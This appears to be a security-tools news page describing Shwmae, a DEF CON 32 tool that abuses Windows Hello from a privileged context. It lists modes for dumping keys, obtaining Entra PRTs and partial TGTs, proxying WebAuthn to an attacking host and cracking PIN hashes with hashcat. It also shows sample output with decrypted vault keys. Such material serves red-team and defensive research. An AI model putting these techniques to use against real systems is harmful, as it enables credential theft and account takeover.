Shwmae (shuh-my) is a Windows Hello abuse tool that was released during DEF CON 32 as part of the Abusing Windows Hello Without a Severed Hand talk.
The purpose of the tool is to abuse Windows Hello from a privileged user context.
Shwmae
Copyright (C) 2024 Shwmae
enum (Default Verb) Enumerate Windows Hello protectors, keys and credentials
sign Sign data using a Windows Hello protected certificate
prt Obtain an Entra PRT and partial TGT usable with Rubeus
webauthn Create a webserver to proxy WebAuthn requests from an attacking host
dump Dump Windows Hello protected keys when backed by software
help Display more information on a specific command.
version Display version information.
The tool features several modes of operation.
When no arguments are provided enumeration is the default mode, alternatively you can use the enum
command.
Enumeration mode will enumerate all Windows Hello containers available, and recursively enumerate all Windows Hello enrolled keys and protectors within the container.
In instances where no TPM is present on the host, a hash is generated for the PIN protector than can be cracked offline using hashcat.
The biometric protector will be decrypted automatically but the PIN and Recovery protectors can be decrypted using the /pin
and /token
arguments respectively.
Only a single protector needs to be decrypted from each container to allow abuse of the Windows Hello keys within that container.
Shwmae
[+] Decrypted SYSTEM vault policy 4bf4c442-9b8a-41a0-b380-dd4a704ddb28 key: 2f662c4708167c02732ae89cd4681557be8c4059b3eab1716bbf20ac5fd000fdd0c5038ce2fc4c89fd6627f45b8e613611e8282d8f38c08e828c023f6b8f060b
[+] Decrypted vault policy:
Aes128: 3cb7dbc9f920a6df0aab211b67ef673d
Aes256: 43642515f325f55c332d14e0295d3ad43dfdb05324fadb7bea687f1a9e0e6ecd
GINGE\mary.gruber (S-1-5-21-1003644063-402998240-3342588708-1111)
Provider : Microsoft Platform Crypto Provider
Protected Recovery Key: eyJWZXJzaW9uIjoxLCJQcm90ZWN0ZW...
Recovery Key : Use /token argument to decrypt recovery key
** Protectors **
Type : Pin
Pin Type : Numeric
Length : 8
Decrypted : Supply /pin argument to attempt decryption
Type : Bio
Encryption Type: Aes
GCM Nonce : cacf46896844d3f96a55fd8c
GCM AuthData : 01000000200000000c000000b400000010000000cacf46896844d3f96a55fd8c
GCM Tag : f5d6d1c3e35f944038e03013851d6d69
Decrypted : True (Bio Key Correct)
ExtPin : 0f28b81e36b0446cf0deb9ca680c05aeb7b7129ab830936fce3836bbd520ee94
DecryptPin : c63e6e0c199cedff0a086277894f85f510305cef6d4c6ac7efc21bb122f537b1
SignPin : 855b2d32d62a4dafb50d47838d4ce13f8d7d6871718e384d6db22b407ecb05a3
Type : Recovery
IV : 49b2c5b8416e5563387e10a8a3d9ae68
** Credentials **
Resource : WinBio Key Resource
SID : S-1-5-21-1003644063-402998240-3342588708-1111
Protector Key : 59e87b8c63973fb3bfd322016a61e33b59a569c22f9aad22d4c91b6db75bcf52
** Keys **
Name : login.windows.net/de60a4fa-d583-4eb0-ab66-ce358af8279c/mary.gruber@ethicalchaos.dev
Provider : Microsoft Platform Crypto Provider
Key Id : {B8EF94E6-23EE-42D3-B8DB-BC0AC5EF1824}
Key File : 1d3ddd8ac0d04ae299673cd1ffb19b90cc2e277d.PCPKEY
Azure Tenant Id : de60a4fa-d583-4eb0-ab66-ce358af8279c
Azure User : mary.gruber@ethicalchaos.dev
Azure kid : l5Ov1EluHGcTl/MCwWooU71x0+sHBs78M1Ts9szdNEw=
Name : FIDO_AUTHENTICATOR//3aeb002460381c6f258e8395d3026f571f0d9a76488dcd837639b13aed316560_fda42d8889ba587fc7fa202a2e6d91ffad4642abb9c2bd75ea9f906be188925126bdf07d591267672cc2fa79b0750de2437b1d77d6f924af1b4992f4e3527bb0
Provider : Microsoft Platform Crypto Provider
Key Id : {36E18DBB-52AC-4198-BD34-55B3490A575C}
Key File : 979dffb30e1a28d7d6c6c1a5e55c383db8d04dbd.PCPKEY
FIDO Relay Party : github.com
FIDO Public Key : RUNTMSAAAADkOpq228W7gXH3VTLeCwScNAyJHFmchJjCZass71QHqCyStIrQWry6m-5XK8HTAdU31UXmkuEI6fjdSmGOtWGR
FIDO Cred Id : qhdzMrPMlH-Fg_sdpNiKhuVpnSd__p1vDN41O3Ip3co
FIDO User Id : _aQtiIm6WH_H-iAqLm2R_61GQqu5wr116p-Qa-GIklEmvfB9WRJnZyzC-nmwdQ3iQ3sdd9b5JK8bSZL041J7sA
FIDO User : mary-gruber
FIDO Display Name: mary-gruber
FIDO Sign Count : 2
Name : //9DDC52DB-DC02-4A8C-B892-38DEF4FA748F (Vault Key)
Provider : Microsoft Software Key Storage Provider
Key Id : {7418B315-A00B-4113-A0EC-5C51718D11C5}
Key File : fc65330b205c133f00d035ea9e8dfba6_2a155d6c-838c-43f5-b943-b21cc30532d7
Name : //CA00CFA8-EB0F-42BA-A707-A3A43CDA5BD9
Provider : Microsoft Software Key Storage Provider
Key Id : {696644C4-EA34-400C-99D2-8B5E38095AA6}
Key File : c4b537d879e21b5d6f797517912be27b_2a155d6c-838c-43f5-b943-b21cc30532d7
For more information click here.
Kali Linux 2024.4, the final release of 2024, brings a wide range of updates and…
This Go program applies a lifetime patch to PowerShell to disable ETW (Event Tracing for…
GPOHunter is a comprehensive tool designed to analyze and identify security misconfigurations in Active Directory…
Across small-to-medium enterprises (SMEs) and managed service providers (MSPs), the top priority for cybersecurity leaders…
The free and open-source security platform SecHub, provides a central API to test software with…
Don't worry if there are any bugs in the tool, we will try to fix…